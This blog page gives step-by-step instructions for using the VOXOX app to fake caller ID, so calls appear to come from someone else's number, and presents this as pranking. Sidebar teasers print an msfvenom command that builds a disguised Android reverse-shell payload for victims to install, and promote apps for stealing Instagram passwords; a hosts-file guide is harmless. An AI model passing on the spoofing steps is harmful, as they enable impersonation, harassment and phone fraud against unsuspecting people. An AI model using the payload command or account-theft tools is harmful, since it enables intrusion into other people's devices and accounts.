Skip to main content

How to Make Free Prank Calls from Anyone’s Number

How to Make Free Prank Calls from Anyone’s Number


prank calls
Pranking is one of my passion and hobby and I try to find different ways that could make people happy and amusing. So earlier I used to post many awesome ways to prank with your friends like the rediff local ads service that could help you in making calls from any advertiser hence confusing that person and another super Bluetooth hack trick that could connect your device to other’s device and then do some mischiefs stuff.
Well today I will be showing you an awesome way that could help you in making calls from anyone’s number to anyone free of charge. Yes you heard it right, you can actually make calls from your friends number to their girlfriends and talk the way your friend would hence pranking with them or in any other way depending on your mind creativity and the way you use this service.
Make Calls with any Caller ID to Anyone
So now you can imagine two persons getting connected with each other and the you are the one who is the host of that call and you can conversate anything. Haha its going to hilarious right, well using VOXOX we can do this thing and the bets part is that this service is available on iOS, Android and Windows.
So if you are not having an Android or iOS device do not worry as you can use Windows software to make prank calls easily. So now lets jump in to see how this whole process works
REMEMBER Make sure you use this only for fun and prank purpose, do not use this in an offensive way it might lead in trouble. And make sure to add +91 in front of the caller id and the number you are dialing else it won’t work.
  1. Visit VOXOX Downloads page and download the appropriate application.
  2. If you are on windows then choose the windows option and download the desired application for your computer.
  3. Now after installing the software you need to Sign Up with their free account that rewards you with $1 free credit.
  4. Simply enter your name, mobile number and email to get started.
  5. After that you will see some screen like below.
    voxox%2520main%2520dial%2520pad%255B4%255D
  6. voxox caller id changing optionNow clicking on that small dial pad will get this big dial pad up where you can enter your friends mobile number that you want to call.
  7. Now to change the CALLER ID you just need to click the small phone icon on the bottom and choose “My Caller ID
  8. Now you will see another dialog popped up where you can change your caller ID to any number in the world you want.
    voxox caller id dialog
  9. Just choose the proper country code, like in the above image I have chosen the India and now insert your mobile number you want to display to your friend.
  10. That’s it now you can press OK and enter your friends mobile number who you want to call.

How to Make Prank Calls from iOS and Android
Well if you are using any iOS or Android based phone then you can use VOXOX App to make prank calls, but remember in Android still now you cannot make proper caller ID change but I have tested this app working in iOS and it works great.
You can simply install this application from the app store and then login using your account, after that from settings you can change the caller ID, make sure that you add+91 in front of the number you want to display and even call else it won’t work.
So guys this ends another awesome post from my side, hope you like this amazing trick to prank your friends with anonymous fake calls,
Posted by Nagesh ;)

Comments

Popular posts from this blog

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...